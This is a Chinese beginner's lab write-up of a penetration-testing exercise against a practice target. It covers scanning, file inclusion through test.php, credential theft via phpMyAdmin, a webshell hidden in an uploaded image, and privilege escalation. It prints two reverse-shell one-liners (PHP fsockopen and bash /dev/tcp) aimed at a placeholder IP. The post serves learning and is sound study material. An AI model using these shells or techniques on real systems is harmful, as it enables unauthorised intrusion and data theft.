开始入门综合渗透-为了巩固学习记个笔记(一开始做了一遍,因为小白为了学习 还是正常思路做)
先看自己ip 然后扫网段(就开了两台机器 去除内部ip 那就只剩131了) 扫它
有个22 和80 看看80有什么
一个网页尝试sql注入顺便试了几次万能密码进不去,网页源码没东西 但是爆破目录出来东西 一个个试
唯一有用的网页就phpmy 和test.php
一看到test.php就感觉很像文件包含 尝试一下 GET方式不行 试试POST
成了 说明有文件下载 那就直接看一开始的网站源码(因为sql语句肯定在里面 可以尝试sql注入)
几个重要点:1.有过滤 2.但是包含文件 过滤太难了 直接看看包含的文件 反正可以下下来 3.从数据库auth查询的账号密码
有数据库账号密码 那就可以直接登phpmy 看账号密码
拿到 返回主页面登录
页面是文件上传并且可以看到你上传的文件信息 二话不说看源码
还是搜集关键点:
1.通过post方式提交add等可以文件包含(上传一句话木马)但是有白名单 文件上传部分绕过pass掉
2.提交的load不为add和show时候会包含你load提交的东西 这是个关键点 说明我们可以上传一个一句话木马图片 通过包含执行命令
3.上传到的路径是uploaded_images 后面包含很有用
提交损坏的jpg等文件会提示上传不了 得在文件后面加一句话木马而且不能让文件损坏 试了好几个图片好不容易试出来一个可以用的
上传好了 试试包含然后执行命令
成了!一次成功 真奇怪我一开始做的时候死活不成功
一句话木马写不进去,就试试反弹shell(大佬们都能写不理解哪里有问题)
反弹shell:
1.php -r '$sock=fsockopen("IP",端口);exec("/bin/sh -i <&3 >&3 2>&3");'
2.bash -c "bash -i >& /dev/tcp/IP/端口 0>&1"
放到网站目录 然后靶机下载编译
没权限 但是要知道linux的tmp目录权限很大 可以在里面执行
成了 提权成功!累die
总结:
思路:1.先看靶机的端口信息(一般主要80端口进去)
2.信息搜集 主要看80端口 看是否有有用的信息(扫目录 看源码)
3.提权 看版本信息是否有漏洞
emmm刚入门只能整理这点 后面继续